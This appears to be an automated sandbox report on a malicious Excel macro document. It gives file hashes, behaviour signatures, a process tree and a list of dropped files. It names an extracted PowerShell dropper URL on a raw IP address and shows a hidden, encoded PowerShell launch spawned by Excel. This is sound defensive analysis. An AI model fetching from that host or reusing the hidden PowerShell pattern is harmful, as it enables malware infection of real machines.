Analysis

  • max time kernel: 16s
  • max time network: 17s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 13-11-2024 21:56

General

  • Target: c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls
  • Size: 46KB
  • MD5: d5f5adcafdae062e965870ced9756be7
  • SHA1: 7cc30262d810e3bfb1c939a5790ec15fb4ff905d
  • SHA256: c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c
  • SHA512: 9fdeddc8c8edad7290e77b5a2ec8182641ae7ddb015f5d25ef6d25eb8dc84e148a276404d4387c38cf13482caa3fc5a9258904274dd40cd53c056628743c3b2e
  • SSDEEP: 768:c4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:HSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated URLs (ps1.dropper): https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process (1 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (1 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)

    Runs PowerShell with a hidden display window.

  • System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry (2 TTPs, 1 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of SetWindowsHookEx (5 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls
    (depth 1)
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc 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
      (depth 2)
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline"
        (depth 3)
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp"
          (depth 4)
          • System Location Discovery: System Language Discovery
          PID:2660

Downloads

  • C:\Users\Admin\AppData\Local\Temp\-clt0ezx.dll
    Filesize: 3KB
    MD5: 72d4364b9d808c59025d07a438bc0dee
    SHA1: 961b8ad40c1926b3c32b113cbf1582a39fd0d59e
    SHA256: f96894db88bdc1ab36250db4807bf4acb0797aeec7e94a9bdd84434d318ce9d9
    SHA512: 7b3632d43ab4cb82c357b2d8eafe4cfc541e8ac1ac6e3b14f33ebb912e403f4a5a5c12f3bd0d6d83e168cc35cc219b300208c11542f723fb95f60ee3276c8e0d

  • C:\Users\Admin\AppData\Local\Temp\-clt0ezx.pdb
    Filesize: 7KB
    MD5: f0e8ca1b3ccf157c485264d26b759253
    SHA1: 11c92f90fcb97b63af1a45bd22e8957636c0393d
    SHA256: 6dfe410e7d2a90ed23a140330f9d3a9afb707b521ba557a4657fea172174a42c
    SHA512: ed746861ffbbf4e96b0705e389417afaef0f73139282b52a706875b15f64ecb166d109ac92885fe0029e03973c39d496edc691430400d726de02f96ad4af2c3b

  • C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp
    Filesize: 1KB
    MD5: 95a2ce51bea89a94c3ba114695b20ca3
    SHA1: 530d762b8e66689b95b615a5008b437d7b9b4e2d
    SHA256: 7b93c733cb3cbf7107db74da6d1a8d48797a8af8f8523d5cb6dc3b5d0ca820e9
    SHA512: bf4cc8343e6934cec4c42afed36022c6684dd0a98b835bd17daeb332a95aa9be187ef5380c6debd614034cf8cada1928ad5a346be32e5c5ff3bb94477c9beca4

  • \??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.0.cs
    Filesize: 631B
    MD5: f4dd5c682eb7b3b679f084261bfc7c4c
    SHA1: 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
    SHA256: 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
    SHA512: 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline
    Filesize: 309B
    MD5: e7ae6b283d6444a1d1e724fc421551d0
    SHA1: 6d956d316f574e3d6cf74deea5bc0137a6ca0310
    SHA256: 540e864c68a6c016c32278965239357eeb8ba2308ff79b3845ba1abc56772f04
    SHA512: b3e96c63621c77241a8fa1d344c46965a58d1e305cbd4f4230c9c34f897961d625005a001c22e03724bef82a862d253e7cc47cb5dd2decb1da422c4eea3bc33e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp
    Filesize: 652B
    MD5: c9bdad78629dd58bff47d3f4d2ebe254
    SHA1: 216a043c403bb6478a86843b0316c0864e273aae
    SHA256: 2dbf83cacdc7827e1abad2dd01f9d766cd81b5f3846cc5b2381a719ed13b2258
    SHA512: b5279c94d40d121895f1818e169372c9876aef14bac05e165efd9927956caa9c5052b146effb1c481e1922f187ca23c708319cba6f644d52298508b42728137f

  • memory/3000-8-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-6-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-4-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-7-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-3-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-1-0x00000000724CD000-0x00000000724D8000-memory.dmp (Filesize: 44KB)
  • memory/3000-9-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-2-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)
  • memory/3000-0-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/3000-27-0x00000000724CD000-0x00000000724D8000-memory.dmp (Filesize: 44KB)
  • memory/3000-28-0x00000000003D0000-0x00000000004D0000-memory.dmp (Filesize: 1024KB)